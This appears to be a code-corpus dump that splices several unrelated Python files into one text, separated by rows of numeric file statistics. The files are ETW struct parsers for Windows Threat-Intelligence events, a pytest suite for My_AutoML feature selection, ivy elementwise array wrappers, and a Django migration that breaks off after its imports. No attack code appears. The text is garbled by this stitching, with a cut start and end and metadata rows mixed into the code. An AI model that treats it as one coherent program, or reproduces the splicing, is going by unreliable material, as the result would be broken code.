"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"OriginalProcessId" / Int32ul,
"OriginalProcessCreateTime" / Int64ul,
"OriginalProcessStartKey" / Int64ul,
"OriginalProcessSignatureLevel" / Int8ul,
"OriginalProcessSectionSignatureLevel" / Int8ul,
"OriginalProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"RegionSize" / Int64ul,
"ProtectionMask" / Int32ul,
"LastProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=28, version=0)
class Microsoft_Windows_Threat_Intelligence_28_0(Etw):
pattern = Struct(
"CallingProcessId" / Int32ul,
"CallingProcessCreateTime" / Int64ul,
"CallingProcessStartKey" / Int64ul,
"CallingProcessSignatureLevel" / Int8ul,
"CallingProcessSectionSignatureLevel" / Int8ul,
"CallingProcessProtection" / Int8ul,
"CallingThreadId" / Int32ul,
"CallingThreadCreateTime" / Int64ul,
"TargetProcessId" / Int32ul,
"TargetProcessCreateTime" / Int64ul,
"TargetProcessStartKey" / Int64ul,
"TargetProcessSignatureLevel" / Int8ul,
"TargetProcessSectionSignatureLevel" / Int8ul,
"TargetProcessProtection" / Int8ul,
"BaseAddress" / Int64ul,
"ViewSize" / Int64ul,
"AllocationType" / Int32ul,
"ProtectionMask" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=29, version=0)
class Microsoft_Windows_Threat_Intelligence_29_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"CodeIntegrityOption" / Int32ul
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=30, version=0)
class Microsoft_Windows_Threat_Intelligence_30_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength)
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=31, version=0)
class Microsoft_Windows_Threat_Intelligence_31_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength)
)
@declare(guid=guid("f4e1897c-bb5d-5668-f1d8-040f4d8dd344"), event_id=32, version=0)
class Microsoft_Windows_Threat_Intelligence_32_0(Etw):
pattern = Struct(
"DriverNameLength" / Int16ul,
"DriverName" / Bytes(lambda this: this.DriverNameLength),
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength)
)
| 39.486076
| 123
| 0.66952
| 1,962
| 31,194
| 10.553007
| 0.077472
| 0.023956
| 0.032939
| 0.050906
| 0.982033
| 0.982033
| 0.980295
| 0.912195
| 0.912195
| 0.912195
| 0
| 0.076025
| 0.231294
| 31,194
| 789
| 124
| 39.536122
| 0.787439
| 0.003334
| 0
| 0.86722
| 0
| 0
| 0.440237
| 0.345227
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.005533
| 0
| 0.08852
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d14bf4e0d49c3a77ab698d38d7c78e2725a23b73
| 18,296
|
py
|
Python
|
tests/test_feature_selection/test_feature_selection.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
tests/test_feature_selection/test_feature_selection.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
tests/test_feature_selection/test_feature_selection.py
|
PanyiDong/AutoML
|
4d981b0287fa27d7a38f029e4b20b3a89e1de4f9
|
[
"MIT"
] | null | null | null |
"""
File: test_feature_selection.py
Author: Panyi Dong
GitHub: https://github.com/PanyiDong/
Mathematics Department, University of Illinois at Urbana-Champaign (UIUC)
Project: My_AutoML
Latest Version: 0.2.0
Relative Path: /tests/test_feature_selection/test_feature_selection.py
File Created: Friday, 15th April 2022 12:27:07 pm
Author: Panyi Dong (panyid2@illinois.edu)
-----
Last Modified: Wednesday, 11th May 2022 9:57:52 am
Modified By: Panyi Dong (panyid2@illinois.edu)
-----
MIT License
Copyright (c) 2022 - 2022, Panyi Dong
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
import pandas as pd
from My_AutoML._feature_selection import feature_selections
from My_AutoML._feature_selection._base import (
PCA_FeatureSelection,
RBFSampler,
)
def test_feature_selection():
# loop through all feature selection methods
for method_name, method in zip(
feature_selections.keys(), feature_selections.values()
):
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
if method_name in ["FeatureFilter", "ASFFS", "GeneticAlgorithm", "RBFSampler"]:
pass
elif method_name == "SFS":
feature_selection = method(
estimator="Lasso",
n_components=5,
criteria="MSE",
)
elif method_name in ["mRMR", "CBFS"]:
feature_selection = method(n_components=5)
else:
feature_selection = method()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
if method_name != "polynomial":
assert (
_X.shape[1] <= X.shape[1]
), "Feature selection method {} failed".format(method_name)
# test sklearn version if autosklearn is installed
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import (
extra_trees_preproc_for_classification,
extra_trees_preproc_for_regression,
liblinear_svc_preprocessor,
polynomial,
select_percentile_classification,
select_percentile_regression,
select_rates_classification,
select_rates_regression,
truncatedSVD,
)
methods = {
"extra_trees_preproc_for_classification": extra_trees_preproc_for_classification,
"extra_trees_preproc_for_regression": extra_trees_preproc_for_regression,
"liblinear_svc_preprocessor": liblinear_svc_preprocessor,
"polynomial": polynomial,
"select_percentile_classification": select_percentile_classification,
"select_percentile_regression": select_percentile_regression,
"select_rates_classification": select_rates_classification,
"select_rates_regression": select_rates_regression,
"truncatedSVD": truncatedSVD,
}
for method_name, method in zip(methods.keys(), methods.values()):
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = method()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_FeatureFilter():
from My_AutoML._feature_selection import FeatureFilter
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = FeatureFilter(
n_components=5,
criteria="Pearson",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method FeatureFilter failed"
feature_selection = FeatureFilter(
n_components=5,
criteria="MI",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method FeatureFilter failed"
def test_ASFFS():
from My_AutoML._feature_selection import ASFFS
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = ASFFS(
n_components=5,
model="Linear",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
feature_selection = ASFFS(
n_components=5,
model="Lasso",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
feature_selection = ASFFS(n_components=5, model="Ridge", objective="MAE")
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method ASFFS failed"
def test_GA():
from My_AutoML._encoding import DataEncoding
from My_AutoML._feature_selection import GeneticAlgorithm
data = pd.read_csv("Appendix/heart.csv")
formatter = DataEncoding()
# to numerical
formatter.fit(data)
data = formatter.refit(data)
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = GeneticAlgorithm(
n_components=5,
feature_selection="random",
fitness_fit="Linear",
n_generations=50,
p_mutation=0.1,
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection=["Entropy"], fitness_fit="Decision Tree"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection=["t_statistics"], fitness_fit="Random Forest"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
feature_selection = GeneticAlgorithm(
n_components=5, feature_selection="auto", fitness_fit="SVM"
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
assert _X.shape[1] <= X.shape[1], "Feature selection method GeneticAlgorithm failed"
def test_feature_selection_PCA_FeatureSelection():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="auto",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="full",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="truncated",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
feature_selection = PCA_FeatureSelection(
n_components=5,
solver="randomized",
)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# def test_feature_selection_LDASelection():
# data = pd.read_csv("Appendix/Medicalpremium.csv")
# X = data.iloc[:, :-1]
# y = data.iloc[:, -1]
# feature_selection = LDASelection(n_components=5)
# feature_selection.fit(X, y)
# assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_RBFSampler():
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = RBFSampler(n_components=5)
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# test decrepted methods
def test_feature_selection_densifier():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import densifier
else:
from My_AutoML._feature_selection._autosklearn import densifier
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = densifier()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import densifier
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = densifier()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# def test_feature_selection_fast_ica():
# from My_AutoML._feature_selection._autosklearn import fast_ica
# data = pd.read_csv("Appendix/Medicalpremium.csv")
# X = data.iloc[:, :-1]
# y = data.iloc[:, -1]
# feature_selection = fast_ica()
# feature_selection.fit(X, y)
# _X = feature_selection.transform(X)
# assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_feature_agglomeration():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import feature_agglomeration
else:
from My_AutoML._feature_selection._autosklearn import feature_agglomeration
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = feature_agglomeration()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import feature_agglomeration
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = feature_agglomeration()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_kernel_pca():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import kernel_pca
else:
from My_AutoML._feature_selection._autosklearn import kernel_pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kernel_pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import kernel_pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kernel_pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_kitchen_sinks():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import kitchen_sinks
else:
from My_AutoML._feature_selection._autosklearn import kitchen_sinks
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kitchen_sinks()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import kitchen_sinks
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = kitchen_sinks()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_nystroem_sampler():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import nystroem_sampler
else:
from My_AutoML._feature_selection._autosklearn import nystroem_sampler
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = nystroem_sampler()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import nystroem_sampler
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = nystroem_sampler()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_pca():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import pca
else:
from My_AutoML._feature_selection._autosklearn import pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import pca
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = pca()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
def test_feature_selection_random_trees_embedding():
import importlib
autosklearn_spec = importlib.util.find_spec("autosklearn")
if autosklearn_spec is None:
from My_AutoML._feature_selection._sklearn import random_trees_embedding
else:
from My_AutoML._feature_selection._autosklearn import random_trees_embedding
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = random_trees_embedding()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
# add tests for sklearn methods when autosklearn is installed
if autosklearn_spec is not None:
from My_AutoML._feature_selection._sklearn import random_trees_embedding
data = pd.read_csv("Appendix/Medicalpremium.csv")
X = data.iloc[:, :-1]
y = data.iloc[:, -1]
feature_selection = random_trees_embedding()
feature_selection.fit(X, y)
_X = feature_selection.transform(X)
assert feature_selection._fitted == True, "Fitted should be True"
| 32.042032
| 93
| 0.690643
| 2,253
| 18,296
| 5.365291
| 0.117621
| 0.247518
| 0.034249
| 0.052945
| 0.80766
| 0.795334
| 0.772253
| 0.752813
| 0.70814
| 0.69722
| 0
| 0.008565
| 0.215129
| 18,296
| 570
| 94
| 32.098246
| 0.833217
| 0.152711
| 0
| 0.709859
| 0
| 0
| 0.13738
| 0.048358
| 0
| 0
| 0
| 0
| 0.112676
| 1
| 0.03662
| false
| 0.002817
| 0.129577
| 0
| 0.166197
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0f0be90d90114a72ba23e639875f66e9c2ca4e8c
| 9,251
|
py
|
Python
|
ivy/array/elementwise.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy/array/elementwise.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy/array/elementwise.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import abc
from typing import Optional, Union
# local
import ivy
# ToDo: implement all methods here as public instance methods
# noinspection PyUnresolvedReferences
class ArrayWithElementwise(abc.ABC):
def abs(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.abs(self._data, out=out)
def acosh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.acosh(self._data, out=out)
def acos(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.acos(self._data, out=out)
def add(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
*,
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.add(self._data, x2, out=out)
def asin(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.asin(self._data, out=out)
def asinh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.asinh(self._data, out=out)
def atan(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.atan(self._data, out=out)
def atan2(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.atan2(self._data, x2, out=out)
def atanh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.atanh(self._data, out=out)
def bitwise_and(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_and(self._data, x2, out=out)
def bitwise_left_shift(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_left_shift(self._data, x2, out=out)
def bitwise_invert(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.bitwise_invert(self._data, out=out)
def bitwise_or(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_or(self._data, x2, out=out)
def bitwise_right_shift(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_right_shift(self._data, x2, out=out)
def bitwise_xor(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.bitwise_xor(self._data, x2, out=out)
def ceil(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.ceil(self._data, out=out)
def cos(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.cos(self._data, out=out)
def cosh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.cosh(self._data, out=out)
def divide(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.divide(self._data, x2, out=out)
def equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.equal(self._data, x2, out=out)
def exp(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.exp(self._data, out=out)
def expm1(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.expm1(self._data, out=out)
def floor(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.floor(self._data, out=out)
def floor_divide(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.floor_divide(self._data, x2, out=out)
def greater(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.greater(self._data, x2, out=out)
def greater_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.greater_equal(self._data, x2, out=out)
def isfinite(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isfinite(self._data, out=out)
def isinf(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isinf(self._data, out=out)
def isnan(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.isnan(self._data, out=out)
def less(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.less(self._data, x2, out=out)
def less_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.less_equal(self._data, x2, out=out)
def log(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log(self._data, out=out)
def log1p(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log1p(self._data, out=out)
def log2(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log2(self._data, out=out)
def log10(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.log10(self._data, out=out)
def logaddexp(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logaddexp(self._data, x2, out=out)
def logical_and(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_and(self._data, x2, out=out)
def logical_not(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.logical_not(self._data, out=out)
def logical_or(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_or(self._data, x2, out=out)
def logical_xor(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.logical_xor(self._data, x2, out=out)
def multiply(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.multiply(self._data, x2, out=out)
def negative(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.negative(self._data, out=out)
def not_equal(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.not_equal(self._data, x2, out=out)
def positive(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.positive(self._data, out=out)
def pow(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.pow(self._data, x2, out=out)
def remainder(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.remainder(self._data, x2, out=out)
def round(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.round(self._data, out=out)
def sign(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sign(self._data, out=out)
def sin(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sin(self._data, out=out)
def sinh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sinh(self._data, out=out)
def square(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.square(self._data, out=out)
def sqrt(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.sqrt(self._data, out=out)
def subtract(
self: ivy.Array,
x2: Union[ivy.Array, ivy.NativeArray],
out: Optional[ivy.Array] = None,
) -> ivy.Array:
return ivy.subtract(self._data, x2, out=out)
def tan(self: ivy.Array, *, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.tan(self._data, out=out)
def tanh(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.tanh(self._data, out=out)
def trunc(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.trunc(self._data, out=out)
def erf(self: ivy.Array, out: Optional[ivy.Array] = None) -> ivy.Array:
return ivy.erf(self._data, out=out)
| 33.518116
| 86
| 0.60988
| 1,302
| 9,251
| 4.264977
| 0.063748
| 0.279489
| 0.123177
| 0.19503
| 0.888529
| 0.799748
| 0.759229
| 0.693859
| 0.682694
| 0.682694
| 0
| 0.008282
| 0.243001
| 9,251
| 275
| 87
| 33.64
| 0.784664
| 0.011674
| 0
| 0.436019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003636
| 0
| 1
| 0.270142
| false
| 0
| 0.014218
| 0.270142
| 0.559242
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
0f550141b52201cabd98458795c733b5538fd14d
| 3,970
|
py
|
Python
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 1
|
2021-05-28T05:22:54.000Z
|
2021-05-28T05:22:54.000Z
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 3
|
2021-05-31T15:44:14.000Z
|
2021-06-29T07:48:13.000Z
|
core/migrations/0015_invoice_salesorder.py
|
tanyutao544/digitalace-backend
|
3607b1325856eafa4e1c96d6189f7aed1b163a19
|
[
"MIT"
] | 1
|
2021-05-30T07:42:54.000Z
|
2021-05-30T07:42:54.000Z
|
# Generated by Django 3.2.3 on 2021-05-28 07:02
from decimal import Decimal
from django.conf import settings
